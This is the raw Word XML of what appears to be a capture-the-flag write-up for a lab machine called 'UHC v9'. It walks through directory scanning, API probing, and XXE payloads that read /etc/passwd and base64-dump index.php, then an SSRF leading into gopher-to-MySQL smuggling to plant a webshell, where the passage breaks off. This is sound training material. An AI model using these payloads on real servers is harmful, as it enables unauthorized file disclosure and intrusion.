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UHC v9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If you require support,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pd76pmbdv2lz"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ogw6ul4ungmd"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552700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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2ugrudvjqnd2" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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3wzlrcxnowg1" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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6z68f3op23n4" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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22 - SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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80 - HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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111 - RPCBIND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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3306 - MYSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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63800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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oqy51q2remp8" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf Scan:</w:t>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use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which uses an existing wordlist of possible common directory names and attempts to load all directory names in that wordlist, then analyzes the status code. (If you are using Kali or ParrotOS, you can find these wordlists in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/usr/share/wordlists/dirbuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or use those from SecLists.)</w:t>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68600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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robots.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we find some endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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32100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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3m23osp6k1nd" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SWAGGER</w:t>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Swagger is an interface description language used to describe RESTful APIs expressed using JSON. Swagger is used together with a set of open-source software tools to design, build, document, and consume RESTful web services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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/swagger</w:t>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/api/v1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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/api/v2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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733800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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inspecting the source code in search of new endpoints, we can find our first flag =)</w:t>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76500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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then begin interacting with the API. For this, I intercept the request using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send it to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</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/api/v1/uhc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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36800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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accessing the endpoint, we can see in the response that it returned some player nicknames along with their respective IDs.</w:t>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try accessing the endpoint </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/v2/uhc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since it was disallowed in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt</w:t>
      </w:r>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79700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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we can see, it returned the same response but now in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XML format</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, interesting 🤔</w:t>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attempt to interact by sending an XML object and changing the request method to POST.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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36800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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we can see, it processed our XML object. We can take advantage of this to perform an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE attack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to try reading some files from the server =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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tdswcp9jpocb" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XML External Entity Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a poorly configured XML parser.</w:t>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hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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send a payload to read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;!DOCTYPE root [&lt;!ENTITY test SYSTEM 'file:///etc/passwd'&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;root&gt;&amp;test;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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59100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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spending some time trying to read interesting files and not finding much, we can attempt to read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. However, we need to encode the file in base64; otherwise, the server will interpret it and return a blank page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;!DOCTYPE root [&lt;!ENTITY test SYSTEM 'php://filter/convert.base64-encode/resource=index.php'&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;root&gt;&amp;test;&lt;/root&gt;</w:t>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28900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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can decode the Base64 and open it in Visual Studio Code to perform a code review =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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echo "BASE64" | base64 -d &gt; index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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08300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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reading </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can find our second flag. In addition, we discover something interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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can access the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/check</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint and pass the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. When setting the parameter, we can see that it performs a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and saves the output to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">storage-framework</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 tested it by sending a request to my machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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25700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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79700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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943600" cy="2679700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2616200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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And we can read the output by accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/storage-framework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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79700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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addition to making requests to my machine, we can make requests to the internal server because we have an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF</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6">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4jq4w4yf9p7y" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF Protocol Smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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SSRF protocol smuggling involves an attacker injecting one TCP protocol into another TCP protocol. A classic example is using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gopher</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the first protocol) to smuggle </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the second protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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can interact with MySQL using the gopher protocol to write a webshell into </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
